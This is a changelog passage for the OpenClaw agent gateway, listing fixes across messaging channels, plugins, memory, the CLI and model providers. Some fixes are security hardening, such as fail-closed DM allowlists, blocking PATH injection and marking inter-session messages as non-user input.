<li>Agents/sessions: mark same-turn <code>sessions_send</code> and A2A reply prompts with an inter-session <code>isUser=false</code> envelope before they reach the model, so foreign session output no longer lands as bare active user text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345004992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73702/hovercard" href="https://github.com/openclaw/openclaw/issues/73702">#73702</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks @alvelda.</li>
<li>Channels/Telegram: fail closed when account-level public DM settings conflict with a restrictive top-level <code>allowFrom</code>, and require an effective wildcard before <code>dmPolicy="open"</code> behaves as public access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>Channels/security: move open-DM allowlist semantics into the shared policy helpers and align Discord, Slack, Mattermost, Matrix, Feishu, LINE, IRC, Google Chat, Zalo, Zalo User, QQ Bot, and Synology Chat so <code>dmPolicy="open"</code> is public only with an effective wildcard and otherwise still respects sender allowlists. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>ACP/tasks: sweep orphaned parent-owned ACP sessions whose task records are gone, preserving bound persistent sessions but clearing unbound stale ACPX metadata so old child sessions cannot silently respawn into chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Outbound/security: strip known internal runtime scaffolding such as <code>&lt;system-reminder&gt;</code> and <code>&lt;previous_response&gt;</code> at the final channel delivery boundary and keep Discord output on targeted tag stripping, so degraded harness replies cannot leak those tags to users. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>. Thanks @gabrielexito-stack and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Security/Telegram: load Telegram security adapters in read-only audit/doctor, audit malformed Telegram DM <code>allowFrom</code> entries even when groups are disabled, and keep allowlist DM audits from counting stale pairing-store senders, so public/shared-DM risk checks stay accurate. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @xace1825.</li>
<li>Plugins: remove hidden manifest, provider-owner, bootstrap, and channel metadata caches so plugin installs, manifest edits, and bundled-root changes are visible on the next metadata read while keeping runtime/module loader caches for actual plugin code. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/plugins: use plugin metadata snapshots for install slot selection and add opt-in plugin lifecycle timing traces, so plugin install avoids runtime-loading the plugin registry for metadata-only decisions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(plugins): restrict bundled plugin dir resolution to trusted package roots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340652676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73275" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73275/hovercard" href="https://github.com/openclaw/openclaw/pull/73275">#73275</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): prevent workspace PATH injection via service env and trash helpers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340617524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73264" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73264/hovercard" href="https://github.com/openclaw/openclaw/pull/73264">#73264</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory: allow <code>allowedChatTypes</code> to include explicit portal/webchat sessions and classify <code>agent:...:explicit:...</code> session keys before opaque session ids can shadow the chat type. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252129588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65775" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65775/hovercard" href="https://github.com/openclaw/openclaw/issues/65775">#65775</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259069037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66285/hovercard" href="https://github.com/openclaw/openclaw/pull/66285">#66285</a>) Thanks @Lidang-Jiang.</li>
<li>Active Memory: allow the hidden recall sub-agent to use both <code>memory_recall</code> and the legacy <code>memory_search</code>/<code>memory_get</code> memory tool contract, so bundled <code>memory-lancedb</code> recall works without breaking the default <code>memory-core</code> path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342562900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73502" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73502/hovercard" href="https://github.com/openclaw/openclaw/issues/73502">#73502</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343523222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73584" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73584/hovercard" href="https://github.com/openclaw/openclaw/pull/73584">#73584</a>) Thanks @Takhoffman.</li>
<li>fix(device-pairing): validate callerScopes against resolved token scopes on repair [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337345824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72925" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72925/hovercard" href="https://github.com/openclaw/openclaw/pull/72925">#72925</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory docs: document the <code>cacheTtlMs</code> 1000-120000 ms range and 15000 ms default so setup snippets do not lead users past the schema limit. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251274400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65708/hovercard" href="https://github.com/openclaw/openclaw/issues/65708">#65708</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251576914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65737/hovercard" href="https://github.com/openclaw/openclaw/pull/65737">#65737</a>) Thanks @WuKongAI-CMU.</li>
<li>fix(agents): canonicalize provider aliases in byProvider tool policy lookup [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337295525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72917" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72917/hovercard" href="https://github.com/openclaw/openclaw/pull/72917">#72917</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): block npm_execpath injection from workspace .env [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340604156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73262/hovercard" href="https://github.com/openclaw/openclaw/pull/73262">#73262</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Tools/web_fetch: decode response bodies from raw bytes using declared HTTP, XML, or HTML meta charsets before extraction, so Shift_JIS and other legacy-charset pages no longer return mojibake. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337284956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72916/hovercard" href="https://github.com/openclaw/openclaw/issues/72916">#72916</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Active Memory: skip payload-less <code>memory_search</code> transcript tool results when building debug telemetry, so newer empty entries no longer hide the latest useful debug payload. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289720192" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68773/hovercard" href="https://github.com/openclaw/openclaw/pull/68773">#68773</a>) Thanks @SimbaKingjoe.</li>
<li>Active Memory: keep recall setup time from consuming the configured model timeout while giving the hook runner an explicit bounded budget for the plugin, so slow embedded-run setup no longer causes immediate recall timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333274016" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72606/hovercard" href="https://github.com/openclaw/openclaw/issues/72606">#72606</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333343055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72620" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72620/hovercard" href="https://github.com/openclaw/openclaw/pull/72620">#72620</a>) Thanks @hyspacex.</li>
<li>Channels/Discord: bound message read/search REST calls, route those actions through Gateway execution, and fall back to <code>CommandTargetSessionKey</code> for inbound hook session keys so Discord reads do not hang and hooks still fire when <code>SessionKey</code> is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341806261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73431" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73431/hovercard" href="https://github.com/openclaw/openclaw/issues/73431">#73431</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342707124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73521" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73521/hovercard" href="https://github.com/openclaw/openclaw/pull/73521">#73521</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/media: auto-enable provider plugins referenced by <code>agents.defaults.imageGenerationModel</code>, <code>videoGenerationModel</code>, and <code>musicGenerationModel</code> primary/fallback refs, so configured Google and MiniMax media providers do not stay disabled behind a restrictive plugin allowlist. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-core/dreaming: retry managed dreaming cron registration after startup when the cron service is not reachable yet, so the scheduled Memory Dreaming Promotion sweep recovers without waiting for heartbeat traffic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336307968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72841/hovercard" href="https://github.com/openclaw/openclaw/issues/72841">#72841</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Acpx/runtime: validate the runtime session mode at the <code>AcpxRuntime.ensureSession</code> wrapper boundary so callers that pass anything other than <code>persistent</code> or <code>oneshot</code> get a clear <code>ACP_INVALID_RUNTIME_OPTION</code> error instead of silently round-tripping through the encoded handle as a default <code>persistent</code> mode and later throwing <code>SessionResumeRequiredError</code>. Investigation context: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339298543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73071/hovercard" href="https://github.com/openclaw/openclaw/issues/73071">#73071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342946140" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73548/hovercard" href="https://github.com/openclaw/openclaw/pull/73548">#73548</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/infer: keep web-search fallback on missing provider API keys, preserve structured validation errors from the selected provider, and let per-request image describe prompts override configured media-entry prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226252002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63263" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63263/hovercard" href="https://github.com/openclaw/openclaw/pull/63263">#63263</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Chat commands: include configured model-catalog reasoning metadata when building <code>/think</code> argument menus so Ollama Cloud and other provider-owned reasoning models show supported levels instead of only <code>off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342653082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73515/hovercard" href="https://github.com/openclaw/openclaw/issues/73515">#73515</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343323395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73568/hovercard" href="https://github.com/openclaw/openclaw/pull/73568">#73568</a>. Thanks @danielzinhu99 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Channels/Telegram: suppress generic tool-progress chatter when preview streaming is off, so non-streaming Telegram turns only deliver final replies while approvals, media, and errors still route normally. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331988059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72363" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72363/hovercard" href="https://github.com/openclaw/openclaw/issues/72363">#72363</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332559274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72482" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72482/hovercard" href="https://github.com/openclaw/openclaw/pull/72482">#72482</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and @SweetSophia.</li>
<li>CLI/model probes: add repeatable image <code>--file</code> inputs to <code>infer model run</code> for local and gateway multimodal model smokes, so vision models such as Ollama Qwen VL and Gemini can be tested through the raw model-probe surface. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>CLI/model probes: request trusted operator scope for <code>infer model run --gateway --model &lt;provider/model&gt;</code> so Gateway raw model smokes can use one-off provider/model overrides instead of being rejected before provider auth resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345598480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73759" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73759/hovercard" href="https://github.com/openclaw/openclaw/issues/73759">#73759</a>. Thanks @chrislro.</li>
<li>CLI/image describe: pass <code>--prompt</code> and <code>--timeout-ms</code> through <code>infer image describe</code> and <code>describe-many</code>, so custom vision instructions and slow local model budgets reach media-understanding providers such as Ollama, OpenAI, Google, and OpenRouter. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>Model selection: include the rejected provider/model ref and allowlist recovery hint when a stored session override is cleared, so local model selections such as Gemma GGUF variants do not fall back to the default with a generic message. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322522808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71069/hovercard" href="https://github.com/openclaw/openclaw/issues/71069">#71069</a>. Thanks @CyberRaccoonTeam.</li>
<li>OpenAI-compatible providers: drop malformed event-only or blank-data SSE frames before the OpenAI SDK stream parser sees them, so proxies that split <code>event:</code> from <code>data:</code> no longer crash streaming runs with <code>Unexpected end of JSON input</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120148034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52802" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52802/hovercard" href="https://github.com/openclaw/openclaw/issues/52802">#52802</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway/OpenAI-compatible streaming: strip <code>&lt;final&gt;</code> tags split across streamed model deltas before they reach SSE clients, so <code>/v1/chat/completions</code> no longer emits tag remnants or drops content when final-answer wrappers cross chunk boundaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63325" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63325/hovercard" href="https://github.com/openclaw/openclaw/issues/63325">#63325</a>. Thanks @tzwickl.</li>
<li>Ollama: resolve explicitly selected signed-in <code>:cloud</code> models through <code>/api/show</code> when <code>/api/tags</code> omits them, so working models such as <code>gemini-3-flash-preview:cloud</code> and <code>deepseek-v4-pro:cloud</code> do not fail dynamic model resolution before the native <code>/api/chat</code> transport runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347240832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73909" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73909/hovercard" href="https://github.com/openclaw/openclaw/issues/73909">#73909</a>. Thanks @chtse53.</li>
<li>Discord/exec approvals: keep the local <code>/approve</code> prompt when no native Discord approval runtime is active, and send a manual fallback notice when native approval delivery reaches no targets, so failed DM cards no longer leave approval turns silent or dependent on model-written shell commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347379791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73954" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73954/hovercard" href="https://github.com/openclaw/openclaw/issues/73954">#73954</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347582133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74027" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74027/hovercard" href="https://github.com/openclaw/openclaw/pull/74027">#74027</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Local model prompt caching: keep stable Project Context above volatile channel/session prompt guidance and stop embedding current channel names in the message tool description, so Ollama, MLX, llama.cpp, and other prefix-cache backends avoid avoidable full prompt reprocessing across channel turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042157634" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40256/hovercard" href="https://github.com/openclaw/openclaw/issues/40256">#40256</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042278613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40296/hovercard" href="https://github.com/openclaw/openclaw/pull/40296">#40296</a>. Thanks @rhclaw and @sriram369.</li>
<li>Gateway/OpenAI-compatible API: guard provider policy lookup against runtime providers with non-array <code>models</code> values, so <code>/v1/chat/completions</code> no longer fails with <code>provider?.models?.some is not a function</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264109417" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66744/hovercard" href="https://github.com/openclaw/openclaw/issues/66744">#66744</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264303605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66761/hovercard" href="https://github.com/openclaw/openclaw/pull/66761">#66761</a>. Thanks @MightyMoud, @MukundaKatta.</li>
<li>WhatsApp/Web: pass explicit Baileys socket timings into every WhatsApp Web socket and expose <code>web.whatsapp.*</code> keepalive, connect, and query timeout settings so unstable networks can avoid repeated 408 disconnect and opening-handshake timeout loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159428566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56365/hovercard" href="https://github.com/openclaw/openclaw/issues/56365">#56365</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343447305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73580" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73580/hovercard" href="https://github.com/openclaw/openclaw/pull/73580">#73580</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/velvet-shark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/velvet-shark">@velvet-shark</a>.</li>
<li>WhatsApp/Web: recover recently active listeners when a post-408 reconnect keeps receiving transport frames but stops delivering app messages, while keeping group metadata fallback off Baileys sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233698306" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63855/hovercard" href="https://github.com/openclaw/openclaw/issues/63855">#63855</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265721576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66920/hovercard" href="https://github.com/openclaw/openclaw/issues/66920">#66920</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887700676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/7433" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/7433/hovercard" href="https://github.com/openclaw/openclaw/issues/7433">#7433</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280282270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67986/hovercard" href="https://github.com/openclaw/openclaw/issues/67986">#67986</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319778979" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70856" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70856/hovercard" href="https://github.com/openclaw/openclaw/issues/70856">#70856</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197893841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60007" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60007/hovercard" href="https://github.com/openclaw/openclaw/pull/60007">#60007</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333345205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72621/hovercard" href="https://github.com/openclaw/openclaw/pull/72621">#72621</a>. Thanks @legonhilltech-jpg, @octopuslabs-fl, @Kanorin-chan, and @stuswan.</li>
